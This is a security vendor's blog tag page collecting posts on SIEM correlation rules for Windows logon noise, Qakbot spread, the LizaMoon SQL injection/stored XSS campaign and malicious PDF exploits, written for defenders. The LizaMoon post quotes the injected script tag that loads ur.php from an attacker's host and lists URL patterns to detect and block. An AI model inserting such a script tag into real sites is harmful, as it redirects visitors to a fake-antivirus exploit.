Posts tagged: 'advanced correlation'
Using the Advanced Intelligence (AI) Engine with LogRhythm allows users to correlate among all the logs in a network and alert when there is anything unusual in the log patterns. My team, the Knowledge Engineers, is tasked with creating rules for advanced correlation and pattern recognition. In the early days of the AI Engine, however, we ran across many unexpected challenges when building many of our prepackaged correlation rules.
Let’s start with an example:
One of our AI Engine rules is designed to detect a brute force attempt followed by a successful login on the same account. The rule looks for at least 5 authentication failures followed by a successful logon by that same origin login. That seems simple enough, but in the AI Engine Beta program we discovered that this alert fired far too often.
Why is this? Investigation into this issue showed us that the Windows logon process doesn’t produce logs exactly as we expected (or as we would like). It turns out that if domain controllers in the environment are connected, then an authentication failure log is produced for every domain controller in the system. This means that in a large environment, someone who types their password incorrectly only one time can produce as many authentication failure logs as there are domain controllers in the network running Active Directory. As a result, this AI Engine rule, which is supposed to catch people logging into accounts that aren’t theirs, had a very high false positive rate during beta testing.
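To make the false positive concrete, here is a minimal Python sketch of the rule logic. It is not LogRhythm's implementation. The event tuple layout, the function name and the idea of counting attempts per reporting domain controller are all assumptions made for illustration. The sketch assumes each domain controller reports a given failed attempt at most once, so the largest per-controller count approximates the number of real attempts.

```python
from collections import defaultdict

def brute_force_then_success(events, min_failures=5, window=300):
    """Return (login, success_time, attempts) for suspicious logons.

    events: iterable of (timestamp_seconds, login, outcome, domain_controller),
    sorted by time, where outcome is "failure" or "success" (hypothetical layout).
    """
    # login -> domain controller -> timestamps of failures it reported
    failures = defaultdict(lambda: defaultdict(list))
    alerts = []
    for ts, login, outcome, dc in events:
        if outcome == "failure":
            failures[login][dc].append(ts)
        elif outcome == "success":
            per_dc = failures.pop(login, {})
            # One mistyped password is echoed by every controller, so count
            # failures per controller and take the largest count instead of
            # summing across controllers.
            attempts = max(
                (sum(1 for t in stamps if ts - t <= window)
                 for stamps in per_dc.values()),
                default=0,
            )
            if attempts >= min_failures:
                alerts.append((login, ts, attempts))
    return alerts
```

With this counting, a single typo echoed by six domain controllers counts as one attempt and does not fire, while five real failures followed by a success still do.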
That raised the question of what happens with other Windows authentication events, such as logons, so we decided to investigate further. Testing logons just around our office yielded a wide variety of results. When I logged in I produced 12 logs classified as Authentication Success and even 4 logs that were classified as Logoffs. Another employee produced 49 logs with a single logon! Some of these logon logs are simply connections to shared resources like a network drive – not actual logons. If a typical user of LogRhythm wants to investigate a specific employee, they will want to find the exact time the employee in question logged on, what they accessed, and what that person did with the objects they accessed. This is a daunting task for a user who doesn’t have a deep understanding of Windows authentication events.
With the creation of the AI Engine rules we realized just how noisy authentication events actually are in Windows. To address this issue, we have fine-tuned our common events and AI Engine rules to filter out all of this extra noise. Because AI Engine rules can leverage all of LogRhythm’s extensive normalization, data enrichment and log parsing, they can be quickly modified for much greater accuracy. And a typical LogRhythm user can investigate incidents without having to understand every individual detail of the Windows authentication process. That is what every SIEM product user is looking for – a simple way to understand exactly what is happening in their network without needing a detailed knowledge of the authentication process.
Not only did this analysis help us create more refined AI Engine rules with fewer false positives, it gave us more refined guidance for normalization, making LogRhythm easier for our customers to use.
The recent compromise at The Hartford Insurance Company highlights the fact that AV software by itself isn’t always an adequate defense – even for malware that has been in the wild for quite some time. It was reported that a W32-Qakbot variant was utilized in this attack – something that has been around since 2009. Qakbot is a piece of malware that has Trojan functionality and spreads via network shares.
After some basic research it looks like Qakbot variants, once installed, reach out to external servers to download a payload providing the extended Trojan functionality, and then spread via network shares. A simple AI Engine rule that looks for an outbound connection opening, followed quickly by network activity or port scanning activity on TCP ports 139 and 445 and/or UDP ports 137 and 138 from the same host would detect Qakbot as it attempts to spread throughout the network (as well as many other types of malware that follow the same activity pattern).
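The pattern described above can be sketched in a few lines of Python. This is only an illustration of the correlation logic, not an AI Engine rule definition. The flow tuple layout, the `internal_prefix` check for telling internal hosts from external ones, and the 120-second window are assumptions.

```python
# Ports named in the post: TCP 139 and 445, UDP 137 and 138.
SHARE_PORTS = {("tcp", 139), ("tcp", 445), ("udp", 137), ("udp", 138)}

def outbound_then_share_activity(flows, internal_prefix="10.", window=120):
    """Flag hosts that open an outbound connection and soon after touch
    file-sharing ports on internal hosts.

    flows: iterable of (ts, src_ip, dst_ip, proto, dst_port), sorted by time
    (hypothetical layout).
    """
    last_outbound = {}  # internal host -> time of its latest outbound connection
    alerts = []
    for ts, src, dst, proto, port in flows:
        if not src.startswith(internal_prefix):
            continue  # only track activity that starts from internal hosts
        if not dst.startswith(internal_prefix):
            last_outbound[src] = ts
        elif (proto, port) in SHARE_PORTS:
            opened = last_outbound.get(src)
            if opened is not None and ts - opened <= window:
                alerts.append((src, dst, proto, port, ts))
    return alerts
```

A real deployment would identify internal hosts from its own network definitions rather than a string prefix, and would probably require several share connections before alarming.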
A SIEM solution with strong pattern recognition capabilities can provide a wider view rather than just focusing on how an exploit works or whether AV signatures will recognize the malicious files as they are scanned. Automated advanced correlation rules can be written to alarm on the activity of the malware. A similar decentralized threat detection approach is outlined in one of my previous blog posts on SQL Injections.
Zak Wolff, our resident malware analyst/SME is taking a closer look at the Hartford breach and will be following up with additional details.
While I will be posting a more in-depth analysis of the LizaMoon attack, here are a few early thoughts from Dave Pack while his blogger profile gets set up. Dave manages LogRhythm’s Knowledge Engineering department and has been working in information security and advanced data analysis for over ten years.
Various security organizations/bloggers are tracking a mass SQL Injection currently being called “LizaMoon” (one of the first websites identified). While we haven’t had a chance to fully analyze the attack, based on information being aggregated by SANS and Stack Overflow, it looks like this is a combination SQL Injection/Stored XSS Attack, the final target being client-side end-users.
It appears that the SQL Injection is taking advantage of a web application vulnerability. The injection itself is delivering a Stored XSS attack to the vulnerable web servers, consisting of a script (< / title> < script src = http : // google-stats49.info/ur.php >) that redirects unlucky internet users to a different site hosting a file named ur.php. This PHP file is where the dirty work is actually done. It launches an exploit which installs fake AV software on the end-user’s machine.
What’s really interesting is that the SQL injection is really just a means of delivering the much more dangerous Stored XSS to vulnerable web servers. Stored XSS are much scarier than a standard Reflected XSS because a user doesn’t have to be tricked into clicking a maliciously crafted URL. The XSS attack is simply sitting on the web server, waiting for any unlucky internet user to browse to the compromised website.
We’re attempting to get our hands on the ur.php code for further analysis of the client-side exploit, after which one of our analysts will be posting an update. In the meantime, here are some things both web administrators and end users can do to detect this attack and help protect against it.
1. Implement standard protections, such as sanitizing all database inputs and using parameterized queries across the board, to limit what can get through.
2. Check if a web server is being targeted by most types of SQL injections.
a. In particular, look at your access logs for “)-” in the URL. It is extremely rare for legitimate input to be commenting out the rest of a SQL statement.
b. Check for various encodings of the same string as well. LogRhythm provides an out-of-the-box AI Engine advanced correlation rule that looks for these strings in a URL and will alarm on any injection attempts.
3. If the functionality is available in your infrastructure, block any attempts to access a website with “ur.php” in the URL.
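As a rough illustration of checks 2a and 2b, the Python sketch below scans request URLs for the “)-” string after undoing URL encoding, including double encoding. It is not the out-of-the-box AI Engine rule. The function names and the `patterns` parameter are hypothetical, and only percent-encoding is handled; other encodings would need their own decoding step.

```python
from urllib.parse import unquote

def fully_decode(url, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also revealed."""
    for _ in range(max_rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url

def suspicious_requests(urls, patterns=(")-",)):
    """Return (original_url, matched_patterns) for URLs containing any pattern
    once decoded. The default pattern is the string named in step 2a."""
    hits = []
    for url in urls:
        decoded = fully_decode(url).lower()
        matched = [p for p in patterns if p in decoded]
        if matched:
            hits.append((url, matched))
    return hits
```

The same function could be pointed at proxy logs with `patterns=("ur.php",)` to spot end users reaching the redirect target mentioned in step 3.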
A recently released Symantec report estimates that 65% of all targeted attacks in 2010 were executed using malicious PDFs. According to the study, this is a 12.4% increase from 2009. “If this trend were to continue at the same rate it has for the last year, by mid-2011, 76% of targeted malware could be used for PDF-based attacks,” the study continues.
In the event that something gets through and also gets executed, let’s look at how you could detect the attack using correlation rules within your SIEM.
For this experiment I looked at a number of malicious PDFs including MD5:411406d5ace2201e5dd73ce8e696b03b. When run, this file exploits a remote memory corruption vulnerability that causes the application to crash while processing the malicious .PDF file. The issue kicks off when the reader tries to initialize the file cooltype.dll. The crash of the Adobe application generates an event whose resulting behavior will be the basis for one of our primary advanced correlation rule blocks.
3/24/2011 8:16 PM TYPE=Error USER= COMP=XXXXX SORC=Application Error CATG=(0) EVID=1000 MESG=Faulting application acrord32.exe, version 18.104.22.168, faulting module unknown, version 0.0.0.0, fault address 0x6753e2ed.
From there we look for some more specific rule blocks. One that could be valuable would be a block for a File Integrity Monitor log indicating that someone opened/read cooltype.dll. As cooltype.dll attacks were not isolated to this particular vulnerability (CVE-2010-2883, CVE-2010-3654, and CVE-2010-1241), this block could prove useful against a number of exploits.
While these two events alone might help shed light on possible attacks, they can also be prone to false positives requiring that you fine-tune the blocks a bit more on this rule. The next blocks are somewhat dependent on your environment and what devices you are logging. The basic behavior, however, will remain the same regardless of what devices you are collecting from and the various vendors.
The next block is more general because we are now just looking for basic malicious behavior. If your first line defenses didn’t prevent the infiltration and the PDF was executed, there is a good chance it will need to phone home to download a payload. This can be done in a number of ways, so we will add a few rule blocks to monitor for some of those possible scenarios.
You may already have rules in place to monitor for outbound SMTP connections from machines that should not be generating such traffic, but the threshold is likely in place to only alert on a large number of instances. In the case of a targeted attack we would not expect this kind of general spambot behavior. Try setting the threshold much lower for this rule, perhaps even on an instance of one outbound SMTP connection.
It may try to phone home via HTTP on port 80, so we’ll add a rule block that checks routers, firewalls and/or NetFlow-generating devices for any source of port 80 traffic not originating from a known web server. We may also want to watch for traffic on port 80 that is not HTTP. In the case of a targeted attack, privacy is typically important to the attacker. Outbound SSL traffic might be considered significant in this situation.
We don’t want to leave out the low-hanging fruit, so we can include rule blocks on a classification or common event of malware detected, correlated against any IDS alerts that may have occurred within a relevant time span. We might also add criteria for older communication methods like IRC just to be safe. In the event that the initial exploit does not crash Adobe in a way that triggers an event log, we would also layer in a second line of defense on our primary rule block. Using one of LogRhythm’s endpoint monitoring capabilities, we can monitor process activity and take note of the acrord32.exe process starting within a relevant time frame of the subsequent events.
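Put together, the rule blocks discussed so far amount to a trigger on the host followed by a phone-home indicator from the same host. The Python sketch below shows that chaining only. The event kind names, the tuple layout and the 10-minute window are invented for illustration and do not correspond to LogRhythm common events.

```python
# Primary blocks: signs that a malicious PDF may have been opened.
TRIGGERS = {"reader_crash", "reader_start", "cooltype_read"}
# Follow-up blocks: signs of phoning home or of other defenses noticing.
FOLLOW_UPS = {"outbound_smtp", "non_http_port_80", "outbound_ssl", "irc", "ids_alert"}

def correlate_pdf_exploit(events, window=600):
    """Return (host, trigger_kind, follow_up_kind, seconds_between) tuples.

    events: iterable of (ts, host, kind), sorted by time (hypothetical layout).
    """
    last_trigger = {}  # host -> (time, kind) of its most recent trigger
    alerts = []
    for ts, host, kind in events:
        if kind in TRIGGERS:
            last_trigger[host] = (ts, kind)
        elif kind in FOLLOW_UPS and host in last_trigger:
            t0, trigger = last_trigger[host]
            if ts - t0 <= window:
                alerts.append((host, trigger, kind, ts - t0))
    return alerts
```

Because a reader start is far more common than a crash, an environment using `reader_start` as a trigger would likely want a shorter window or a second follow-up before alarming.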
Periodic maintenance of these rules is necessary to keep them relevant. Stay current on zero day (Adobe and Microsoft) exploits and pay attention to what files they are working against. Incorporate these target files (cooltype.dll) into rules whenever possible. Ideally this would be before patches are released.
There will never be a silver bullet to detect malicious attacks. But with creative use of your SIEM’s advanced correlation rules you can alert on some very interesting behavior. Obviously you should start with the basics and keep your systems patched. But in the event that something slips through your first line defenses, why not exercise your SIEM solution to the fullest to help keep your network secure?
Today LogRhythm officially released our Advanced Intelligence (AI) Engine – a fully integrated extension of our core solution that performs advanced correlation and pattern recognition. And while the concept isn’t new, we’re pretty sure that once you take a look, you’ll see that the execution is pretty groundbreaking.
So what is advanced correlation and pattern recognition? In practical terms, it’s being able to automatically identify a sequence of events and recognize a relevant pattern of behavior that will have some sort of impact on another event that will happen as a result. If this were to take place in your brain, it might happen something like this… You walk in the house from the garage and shut the door behind you. Once that’s done, you might expect to see moonlight coming through the next doorway as you make your way up the stairs. So logically if it’s too dark something is wrong. You should automatically realize that the absence of light once you shut the door behind you means that the next door is shut. Typically you would register the correlation between the two and you would know to put your hand out to open the next door. Unless you, like me, are on autopilot by the time you get home from work. Because there are better ways to make that connection than with your forehead.
Unlike your brain, an IT environment is not typically capable of recognizing an important sequence on its own. That’s why solutions exist to analyze event data and let you know when something has happened or is about to happen that may cause you pain. From a security standpoint that might be five failed login attempts from a single unknown IP followed by a successful login, indicating that you may have suffered an external breach.
Tools for doing this have been around for a while, but with limitations. One of them is that they are typically restricted to analyzing a subset of data that has already filtered out significant information before it ever gets to the correlation engine. This narrows the scope of coverage to specific security-oriented use cases and takes away the flexibility to cast a wider net for event sequences that may not be as well defined. AI Engine has removed this limitation by allowing advanced correlation rules to be run against all log data. By doing so we have expanded the scope of what you can do with advanced correlation and pattern recognition to extend well beyond the standard security use cases. An operations example would be when you have a critical process that may start and stop on a regular basis. Operationally this is standard behavior. You don’t need to know every time the process stops or you’ll quickly start ignoring the alerts. But you do need to know when it doesn’t start back up within a certain time frame.
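The operations example is a rule about the absence of an event, which is easy to get wrong. A minimal Python sketch of the idea follows. The event layout, the function name and the 5-minute allowance are assumptions, not AI Engine settings.

```python
def missing_restarts(events, now, max_downtime=300):
    """Return processes that stopped and have not started again in time.

    events: iterable of (ts, process, state), sorted by time, where state is
    "start" or "stop" (hypothetical layout). now: current time in seconds.
    """
    stopped_at = {}  # process -> time of the stop that is still outstanding
    for ts, process, state in events:
        if state == "stop":
            stopped_at[process] = ts
        elif state == "start":
            stopped_at.pop(process, None)  # a restart clears the pending stop
    return sorted(p for p, ts in stopped_at.items() if now - ts > max_downtime)
```

Routine stop and start pairs produce nothing here. Only a stop that has gone unanswered for longer than `max_downtime` is reported.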
Perhaps the biggest drawback of most advanced correlation tools is their complexity. They may work well within the confines of their preconfigured rules, but adaptability and usability are limited. They’re kind of like a remote control that handles a few functions and operates your television. Your options for adding new features to the remote are limited. If you have the tools, the time and the knowledge, you can take the remote apart and rebuild it to handle your new Blu-ray player. Practically speaking you will probably be adding a second remote to your collection or you’ll be waiting for a remote that someone else builds that is capable of working with your TV and Blu-ray player. Add a receiver for a new sound system and you have a third remote. Now this may not be that bad at home, but imagine you have thousands of heterogeneous devices that you need to control, and limited time to do so. What you really need is one universal remote that handles all of your devices and can be easily programmed to handle what you have now and what you will add in the future. And as new features are added, the remote has to adapt to those as well.
It’s the same thing with pattern recognition. Sure there are specific behavior patterns that you know you have to identify because they are similar for all environments, but over time, that behavior may change. And there are things that you may want to watch for that are less defined but no less important to detect. For those things you need the ability to cast a wider net and once you are able to detect and understand those behavior patterns that are more general, you also need to be able to quickly put a rule in place that will narrow in on specific activities. Without a usable interface, advanced correlation tools lack the flexibility to adapt to what you need in your environment or to keep up with new behavior patterns that are critical to security and operations.
AI Engine is accessed through LogRhythm’s console, with the same consistent look and feel inherent to all LogRhythm tools. A wizard-based interface with a drag-and-drop GUI for defining advanced correlation makes creating and customizing even complex rules simple to learn and quick to execute. It also correlates against all log data – not just a pre-filtered subset of security events. AI Engine analyzes over 50 different metadata fields and many more sub-fields that provide highly relevant data for analysis and correlation. The metadata fields map to system, network and application information extracted from the logs themselves, but they also include context that is derived from the log information such as direction, impacted entities, the city from which activity originated and more. The extensive metadata from which advanced correlation rules and patterns can be defined, combined with the entirety of all log data against which these rules can be applied, offers unprecedented visibility and context to threats and operational issues that have been blind spots for many organizations until now. At the same time, AI Engine can easily be used to cast a wide net with more general correlation rules, ensuring that significant incidents are captured despite changes in event behavior. Sure AI Engine comes with over 100 rules ready to go out-of-the-box covering a wide range of common use cases, both general and tightly focused. But we’ve also designed it to work for you.
If you want to know more about our AI Engine, we’ll be happy to show you how it works. Just let us know. Or check out Chris Petersen’s video in which he demonstrates AI Engine. You can hear the entire LogRhythm story or simply jump to the chapter on AI Engine. Watch the Demo.